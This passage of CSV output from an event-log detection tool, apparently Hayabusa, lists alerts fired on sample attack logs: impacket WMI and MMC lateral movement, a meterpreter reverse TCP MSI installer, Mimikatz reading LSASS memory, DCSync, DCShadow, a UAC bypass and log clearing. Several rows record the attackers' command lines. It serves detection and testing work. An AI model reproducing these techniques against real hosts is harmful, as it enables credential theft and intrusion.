+09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49160 (IEWIN7) | Dst: 10.0.2.19:4444 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:32:50.902 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45616 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 3840 | PGUID: 
365ABB72-B0F3-5CC8-0000-00105F321D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2504 | PGUID: 365ABB72-B0F3-5CC8-0000-0010B1361D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2828 | PGUID: 
365ABB72-B0F3-5CC8-0000-0010C43A1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | LID: 0x1d313d | PID: 3328 | PGUID: 365ABB72-B0F3-5CC8-0000-0010373E1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49162 (IEWIN7) | Dst: 
127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49162 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\mmc.exe -Embedding | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1ea3c6 | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,Exec,MMC20 Lateral Movement,,rules/sigma/process_creation/proc_creation_win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1504 | PGUID: 365ABB72-B180-5CC8-0000-00102BB71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45622 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49163 (IEWIN7) | Dst: 10.0.2.19:33474 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49164 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49164 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 
05:35:13.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 3372 | PGUID: 365ABB72-B181-5CC8-0000-0010ADBF1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1256 | PGUID: 365ABB72-B181-5CC8-0000-001023C41E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 
05:35:13.512 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | LID: 0x1ea3c6 | PID: 692 | PGUID: 365ABB72-B181-5CC8-0000-00108DC71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 07:48:58.901 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Local\Temp\302a23.msi | Process: C:\Windows\System32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:48:58.901 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-00109B5A3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:48:59.260 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\vssvc.exe | Process: C:\Windows\System32\VSSVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 
365ABB72-D0DB-5CC8-0000-0010488A3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:08.760 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Windows\Installer\304d1c.msi | Process: C:\Windows\system32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:49:07.854 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-0010216F3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00 | Hash: SHA1=06B1640F88EDC6A7CE3303CB14A505A86B061616,MD5=E40CF1CC132F25719F86F0FC5870910D,SHA256=A89385CCD4BE489CD069C65DA10A0B952CB3DE9090EF4C9F02E1368392CD66C5,IMPHASH=481F47BBB2C9C21E108D65F52B04C448",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | LID: 
0xffe4 | PID: 2892 | PGUID: 365ABB72-D0E5-5CC8-0000-0010DADF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,PrivEsc,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd | LID: 0xffe4 | PID: 1372 | PGUID: 365ABB72-D1AB-5CC8-0000-0010DB1E4400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-02 23:48:53.950 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49178 (IEWIN7.home) | Dst: 151.101.36.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1508 | PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,Exec,PowerShell Network 
Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 1508 | Src PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00 | Tgt PID: 484 | Tgt PGUID: 365ABB72-8077-5CCB-0000-0010F2590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: 
student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx +2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,info,,Admin Logon,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,info,,Logoff,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine 
Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-08 12:00:37.572 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-08 12:00:37.586 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-09 10:59:28.669 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.684 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\eventvwr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3752 | Tgt PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.684 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 
3752 | PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.950 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x1394a | PID: 3884 | PGUID: 365ABB72-8980-5CD3-0000-00105F451F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0x1394a | PID: 3840 | PGUID: 365ABB72-8980-5CD3-0000-0010134D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,Evas | PrivEsc,UAC Bypass via Event Viewer,,rules/sigma/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:00:01.794 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 
